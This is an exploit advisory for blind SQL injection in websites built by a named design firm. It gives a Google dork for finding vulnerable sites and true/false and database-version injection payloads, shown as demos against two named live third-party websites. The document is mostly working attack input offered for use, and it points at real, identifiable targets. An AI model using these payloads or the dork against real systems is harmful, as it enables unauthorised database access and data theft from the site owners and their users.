*********************************************************
#Exploit Title: Stealth Media Ltd - Blind Sql Injection
#Date: 2024-02-24
#Exploit Author: Behrouz Mansoori
#Google Dork: "Website Designed & Developed By Stealth Media Ltd."
#Category:webapps
#Tested On: Mac, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://www.completeconsultingltd.co.nz/gallery2.php?id=15%20and%20true--
* https://www.completeconsultingltd.co.nz/gallery2.php?id=15%20and%20false--
* https://www.completeconsultingltd.co.nz/gallery2.php?id=15%20and%20substring(@@version,1,1)=5--
### Demo 2:
* https://www.superyachtcoatings.com/project-info.php?id=53%20and%20true--
* https://www.superyachtcoatings.com/project-info.php?id=53%20and%20false--
* https://www.superyachtcoatings.com/project-info.php?id=53%20and%20substring(@@version,1,1)=5--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************